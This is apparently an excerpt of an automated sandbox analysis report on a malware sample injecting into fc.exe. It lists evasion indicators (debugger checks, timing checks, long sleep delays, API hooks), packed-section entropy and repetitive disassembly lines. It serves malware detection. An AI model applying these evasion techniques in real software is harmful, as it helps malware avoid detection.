                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A01BAA push ds; iretd 7_2_02A01BBA
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A01B83 push ecx; iretd 7_2_02A01B8E
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A15BC6 pushfd ; ret 7_2_02A15BCD
                Source: SDBARVe3d3.exe, Static PE information: section name: .text entropy: 7.986248350186217
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack: High entropy of concatenated method names
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fc.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: SDBARVe3d3.exe PID: 7532, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\fc.exe, API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\fc.exe, API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\fc.exe, API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\fc.exe, API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\fc.exe, API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\fc.exe, API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\fc.exe, API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\fc.exe, API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Memory allocated: 2B00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Memory allocated: 2CE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Memory allocated: 2B00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Memory allocated: 8000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Memory allocated: 9000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Memory allocated: 91C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Memory allocated: A1C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_0176096E rdtsc 2_2_0176096E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\fc.exe, Window / User API: threadDelayed 9836
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\fc.exe, API coverage: 3.2 %
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe TID: 7552, Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\fc.exe TID: 8148, Thread sleep count: 137 > 30
                Source: C:\Windows\SysWOW64\fc.exe TID: 8148, Thread sleep time: -274000s >= -30000s
                Source: C:\Windows\SysWOW64\fc.exe TID: 8148, Thread sleep count: 9836 > 30
                Source: C:\Windows\SysWOW64\fc.exe TID: 8148, Thread sleep time: -19672000s >= -30000s
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176, Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176, Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176, Thread sleep time: -51000s >= -30000s
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176, Thread sleep count: 39 > 30
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176, Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\fc.exe, Last function: Thread delayed
                Source: C:\Windows\SysWOW64\fc.exe, Code function: 7_2_02A1C500 FindFirstFileW,FindNextFileW,FindClose, 7_2_02A1C500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Thread delayed: delay time: 922337203685477
                Source: wPGxKDFwovcH.exe, 00000008.00000002.4134483767.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB bxL
                Source: firefox.exe, 00000009.00000002.2408227043.00000228AF90C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Process queried: DebugPort
                Source: C:\Windows\SysWOW64\fc.exe, Process queried: DebugPort
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_0176096E rdtsc 2_2_0176096E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_00417793 LdrLoadDll, 2_2_00417793
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h] 2_2_017F4164
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h] 2_2_017F4164
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017B8158 mov eax, dword ptr fs:[00000030h] 2_2_017B8158
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_01726154 mov eax, dword ptr fs:[00000030h] 2_2_01726154
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_01726154 mov eax, dword ptr fs:[00000030h] 2_2_01726154
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_0171C156 mov eax, dword ptr fs:[00000030h] 2_2_0171C156
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017B4144 mov ecx, dword ptr fs:[00000030h] 2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h] 2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_01750124 mov eax, dword ptr fs:[00000030h] 2_2_01750124
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe, Code function: 2_2_017CA118 mov ecx, dword ptr fs:[00000030h] 2_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]2_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]2_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]2_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E0115 mov eax, dword ptr fs:[00000030h]2_2_017E0115
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017501F8 mov eax, dword ptr fs:[00000030h]2_2_017501F8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F61E5 mov eax, dword ptr fs:[00000030h]2_2_017F61E5
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h]2_2_017E61C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h]2_2_017E61C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]2_2_017A019F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]2_2_017A019F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]2_2_017A019F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]2_2_017A019F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]2_2_0171A197
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]2_2_0171A197
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]2_2_0171A197
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01760185 mov eax, dword ptr fs:[00000030h]2_2_01760185
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DC188 mov eax, dword ptr fs:[00000030h]2_2_017DC188
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DC188 mov eax, dword ptr fs:[00000030h]2_2_017DC188
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C4180 mov eax, dword ptr fs:[00000030h]2_2_017C4180
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C4180 mov eax, dword ptr fs:[00000030h]2_2_017C4180
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174C073 mov eax, dword ptr fs:[00000030h]2_2_0174C073
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01722050 mov eax, dword ptr fs:[00000030h]2_2_01722050
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6050 mov eax, dword ptr fs:[00000030h]2_2_017A6050
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6030 mov eax, dword ptr fs:[00000030h]2_2_017B6030
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A020 mov eax, dword ptr fs:[00000030h]2_2_0171A020
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171C020 mov eax, dword ptr fs:[00000030h]2_2_0171C020
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]2_2_0173E016
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]2_2_0173E016
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]2_2_0173E016
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]2_2_0173E016
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A4000 mov ecx, dword ptr fs:[00000030h]2_2_017A4000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171C0F0 mov eax, dword ptr fs:[00000030h]2_2_0171C0F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017620F0 mov ecx, dword ptr fs:[00000030h]2_2_017620F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0171A0E3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A60E0 mov eax, dword ptr fs:[00000030h]2_2_017A60E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017280E9 mov eax, dword ptr fs:[00000030h]2_2_017280E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A20DE mov eax, dword ptr fs:[00000030h]2_2_017A20DE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E60B8 mov eax, dword ptr fs:[00000030h]2_2_017E60B8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E60B8 mov ecx, dword ptr fs:[00000030h]2_2_017E60B8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B80A8 mov eax, dword ptr fs:[00000030h]2_2_017B80A8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172208A mov eax, dword ptr fs:[00000030h]2_2_0172208A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C437C mov eax, dword ptr fs:[00000030h]2_2_017C437C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov ecx, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EA352 mov eax, dword ptr fs:[00000030h]2_2_017EA352
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C8350 mov ecx, dword ptr fs:[00000030h]2_2_017C8350
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171C310 mov ecx, dword ptr fs:[00000030h]2_2_0171C310
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01740310 mov ecx, dword ptr fs:[00000030h]2_2_01740310
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]2_2_0175A30B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]2_2_0175A30B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]2_2_0175A30B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]2_2_0173E3F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]2_2_0173E3F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]2_2_0173E3F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017563FF mov eax, dword ptr fs:[00000030h]2_2_017563FF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]2_2_017CE3DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]2_2_017CE3DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE3DB mov ecx, dword ptr fs:[00000030h]2_2_017CE3DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]2_2_017CE3DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C43D4 mov eax, dword ptr fs:[00000030h]2_2_017C43D4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C43D4 mov eax, dword ptr fs:[00000030h]2_2_017C43D4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DC3CD mov eax, dword ptr fs:[00000030h]2_2_017DC3CD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]2_2_017283C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]2_2_017283C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]2_2_017283C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]2_2_017283C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A63C0 mov eax, dword ptr fs:[00000030h]2_2_017A63C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]2_2_01718397
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]2_2_01718397
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]2_2_01718397
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]2_2_0171E388
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]2_2_0171E388
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]2_2_0171E388
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174438F mov eax, dword ptr fs:[00000030h]2_2_0174438F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174438F mov eax, dword ptr fs:[00000030h]2_2_0174438F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]2_2_01724260
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]2_2_01724260
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]2_2_01724260
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171826B mov eax, dword ptr fs:[00000030h]2_2_0171826B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A250 mov eax, dword ptr fs:[00000030h]2_2_0171A250
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726259 mov eax, dword ptr fs:[00000030h]2_2_01726259
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DA250 mov eax, dword ptr fs:[00000030h]2_2_017DA250
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DA250 mov eax, dword ptr fs:[00000030h]2_2_017DA250
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A8243 mov eax, dword ptr fs:[00000030h]2_2_017A8243
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A8243 mov ecx, dword ptr fs:[00000030h]2_2_017A8243
